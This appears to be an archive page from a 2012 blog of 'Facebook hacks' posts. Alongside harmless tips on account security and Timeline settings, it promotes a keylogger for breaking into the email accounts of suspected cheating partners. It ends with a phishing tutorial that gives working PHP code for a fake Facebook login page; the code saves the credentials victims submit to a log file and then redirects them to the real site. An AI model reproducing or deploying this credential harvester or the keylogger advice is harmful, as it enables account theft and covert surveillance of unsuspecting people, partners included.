Showing posts with label Facebook hacks. Show all posts
Showing posts with label Facebook hacks. Show all posts

Thursday, June 28, 2012

Ardamax Keylogger to hack FB Accounts{Download for free}


Wondering to know how to hack an email account? Well, before you can do that, you need to understand the real ways of hacking that actually work and also that are simply scam and do not work.
So, here in this post, I am going to discuss some of the Real and Working Ways to hack emails; along with that, I am also going to make you aware of the common myths and scams associated with email hacking.
On a regular basis, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating, and ask me how to hack their email password so as to find out the truth. If you are in a similar situation where you want to hack into someone’s email account, then this post might help you!




Sunday, June 17, 2012

How To Protect Your Facebook Account | Facebook Tips


In Today’s world we’re all living through the Internet in some form or another and Facebook is like our second home. Facebook is the most widely used social network in the world with more than 600 million users. In this post I will provide you some steps to secure your online presence on Facebook (Facebook Security).

facebook-protect

How to Disable Facebook Timeline in Chrome with Timeline Remove Extension




Facebook Timeline feature is pretty looking good. But, some people don’t like the new layout. Here is a guide to remove timeline on Google chrome with timeline remove extension:

facebook chrome Browser How to Disable Facebook Timeline in Chrome with Timeline Remove Extension

Tuesday, May 29, 2012

Disable Facebook Timeline App

Disable Facebook Timeline App

disable Timeline layoutFacebook timeline is a great way of displaying your old photos, memorable posts and apps with your friends and family. This feature changes your entire Facebook Profile layout into a more attractive look. I previously wrote a tutorial on how to Enable Facebook Timeline Feature and today I am sharing the tuto
rial on how to completely remove the timeline app from your profile and revert to older Facebook profile layout. Since this time-based story telling did receive mixed feedback therefore it would be really helpful for most of you to learn how to undo/delete this application.

Thursday, May 24, 2012

How to Add FaceBook Page Like Box to your Blog

How to Add FaceBook Page Like Box to your Blog


Having a Facebook Page for our blog is a great way to promote it. Facebook Pages give you a more dynamic relationship with the public figures and organizations you are interested in. In simple words, it helps us to share blog updates to the interested facebook users who become a ‘fan’ of our blog Description: :) .
This post gives you a simple tutorial on how to add a Facebook Like Box widget to your blogs. If you haven’t created a facebook page yet, you can do it from here.


How to Add FaceBook Like Box to self-hosted WordPress:
You can do this simply by installing Facebook Like Box Widget to your wordpress. It allows you to enable Facebook Page Like Box through a widget. Refer the Installation and Screenshots sections for more help.

Monday, May 14, 2012

Get Free Likes On Your Facebook Status Or Pic Now



Get Free Likes On Your Facebook Status Or Pic Now

Many time i also try to get more Facebook likes on my status or pic that i upload my i have few friends so tried to search many software of services but they ask for $$$ to give likes on my status or pi, My friend also asking about it.If you did not understand, just watch the video tutorial given at the end of article.
But now my dream come true and my friend Abhishek Luthra just design a free online easy software to give me free status or pic like that i am going to share with you here.

Friday, May 11, 2012

How to hack Facebook using Phishing Page





last week a person requested here to explain how to make a fake login page of Facebook.. So i am giving a lesson here about making fake page of Facebook.


Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.




First i recommend you all to read my previous article on phishing page "How to make a Fake login page manually"  coz here in this post i m not gonna explain all things as i hv done it before.



well, here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files




Step 1. Creating a login.php file>
Open notepad and  paste the following lines there... as save it with name login.php


Code Updated: By mistake i hv missed one line in php file, i hv add that line now. Sorry for inconvenience. 


<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>